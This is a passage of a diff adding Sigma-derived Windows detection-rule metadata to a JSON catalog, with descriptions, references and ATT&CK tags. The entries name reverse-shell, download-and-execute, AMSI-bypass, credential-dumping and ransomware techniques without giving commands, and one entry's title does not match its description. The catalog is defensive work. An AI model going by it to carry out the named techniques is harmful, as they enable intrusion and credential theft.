"logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "uuid": "b3512211-c67e-4707-bedc-66efc7848863", + "value": "PowerShell 
Downgrade Attack", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/03/20", + "filename": "proc_creation_win_powershell_downgrade_attack.yml", + "author": "Harish Segar (rule)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_powershell_download.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "value": "Suspicious PowerShell Download and Execute Pattern", + "meta": { + "refs": [ + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/02/28", + "filename": "proc_creation_win_powershell_download_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Software installers that pull packages from remote systems and execute them" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious FromBase64String expressions in command line arguments", + "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", + "value": "FromBase64String Command Line", + "meta": { + "refs": [ + "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" + ], + "tags": [ + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" + ], + "creation_date": "2020/01/29", + "filename": "proc_creation_win_powershell_frombase64string.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative script libraries" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2020/05/02", + "filename": 
"proc_creation_win_powershell_get_clipboard.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder", + "meta": { + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/06", + "filename": "proc_creation_win_powershell_public_folder.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "value": "Powershell Reverse Shell Connection", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "author": "FPT.EagleEye, wagga", + "level": "high", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects adding and using 
Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ], + "creation_date": "2021/03/03", + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "author": "FPT.EagleEye", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring", + "meta": { + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + 
"value": "Suspicious XOR Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" + ], + "creation_date": "2018/09/05", + "filename": "proc_creation_win_powershell_xor_commandline.yml", + "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence", + "meta": { + "refs": [ + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2018/03/06", + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "author": "Markus Neis, @Karneades", + "level": "high", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and 
delete the driver files", + "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "value": "PowerTool Execution", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/11/29", + "filename": "proc_creation_win_powertool_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "value": "Privilege Escalation via Named Pipe Impersonation", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2021/08/16", + "filename": "proc_creation_win_procdump.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate use of procdump by a developer or administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_procdump_evasion.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Cases in which procdump just gets copied to a different directory without any renaming" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process memory dump performed by RdrLeakDiag.exe", + "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "value": "Process Dump via RdrLeakDiag.exe", + "meta": { + "refs": [ + "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/09/24", + "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", + "author": "Cedric MAURUGEON", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", + "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", + "value": "Process Dump via Rundll32 and Comsvcs.dll", + "meta": { + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Wietze/status/1542107456507203586", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" + ], + "tags": [ 
+ "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ], + "creation_date": "2020/02/18", + "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", + "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_proc_dump_createdump.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Command lines that use the same flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", + "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", + "value": "DumpMinitool Usage", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": 
"2022/04/06", + "filename": "proc_creation_win_proc_dump_dumpminitool.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", + "uuid": "6355a919-2e97-4285-a673-74645566340d", + "value": "RdrLeakDiag Process Dump", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "value": "Suspicious DumpMinitool Usage", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/04/06", + "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious parent processes of well-known Windows processes", + "uuid": 
"96036718-71cc-4027-a538-d1587e0006a7", + "value": "Windows Processes Suspicious Parent Directory", + "meta": { + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036.005" + ], + "creation_date": "2019/02/23", + "filename": "proc_creation_win_proc_wrong_parent.yml", + "author": "vburov", + "level": "low", + "falsepositive": [ + "Some security products seem to spawn these" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Emulates attack via documents through protocol handler in Microsoft Office. 
On successful execution you should see Microsoft Word launch a blank file.", + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "ProtocolHandler.exe Downloaded Suspicious File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "proc_creation_win_protocolhandler_susp_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", + "value": "Proxy Execution via Wuauclt", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_proxy_execution_wuauclt.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a PsExec service start", + "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "value": "PsExec Service Start", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" + ], + "tags": [ + "attack.execution", + "attack.s0029", + "attack.t1569.002" + ], + "creation_date": "2018/03/13", + "filename": "proc_creation_win_psexesvc_start.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ], + "creation_date": "2022/11/04", + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "author": "@Kostastsale", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage", + "meta": { + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ], + "creation_date": "2022/08/30", + "filename": "proc_creation_win_pua_defendercheck.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ], + "creation_date": "2022/10/18", + "filename": "proc_creation_win_pua_seatbelt.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_public_folder_parent.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator", + "meta": { + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ], + "creation_date": "2021/06/18", + "filename": "proc_creation_win_purplesharp_indicators.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz", + "meta": { + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/01/05", + "filename": "proc_creation_win_pypykatz.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + 
"Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects python spawning a pretty tty", + "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "value": "Python Spawning Pretty TTY on Windows", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_win_python_pty_spawn.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage", + "meta": { + "refs": [ + "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2022/09/05", + "filename": "proc_creation_win_quarks_pwdump.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", + "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "value": "Query Registry", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.t1007" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_query_registry.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "value": "Query Usage To Exfil Data", + "meta": { + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/01", + "filename": "proc_creation_win_query_session_exfil.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This command line patterns found in BlackByte Ransomware operations", + "uuid": "999e8307-a775-4d5f-addc-4855632335be", + "value": "BlackByte Ransomware Patterns", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_ransom_blackbyte.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": 
"process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File", + "meta": { + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/10/28", + "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "value": "MSTSC Shadowing", + "meta": { + "refs": [ + "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002" + ], + "creation_date": "2020/01/24", + "filename": "proc_creation_win_rdp_hijack_shadowing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", + "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", + 